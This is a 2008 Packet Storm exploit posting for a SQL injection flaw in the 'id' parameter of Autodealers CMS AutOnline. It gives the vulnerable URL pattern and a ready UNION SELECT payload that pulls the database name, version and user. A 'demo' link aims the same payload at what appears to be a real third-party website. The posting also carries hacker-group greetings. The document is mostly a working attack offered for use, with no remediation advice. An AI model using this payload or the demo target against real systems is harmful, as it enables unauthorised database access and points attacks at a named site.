autodealerscms-sql.txt

2008-09-11T00:00:00
ID PACKETSTORM:69881
Type packetstorm
Reporter ZoRLu
Modified 2008-09-11T00:00:00

Description

                                        
                                            `############################################################################################################  
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability  
[+] Discovered By ZoRLu  
[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org & darkc0de.org   
[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs   
[+] trt-turk@hotmail.co & zorlu@w.cn   
############################################################################################################  
[+]  
[+]  
[+]  
[+]  
  
exploit:  
http://localhost/script_path/index.php?page=detail&id=[SQL]  
  
[+]  
[+]  
[+]  
[+]  
  
[SQL]=  
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*  
  
[+]  
[+]  
[+]  
[+]   
[+]  
  
demo:  
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*  
  
[+]  
[+]   
[+]  
[+]   
############################################################################################################  
  
  
`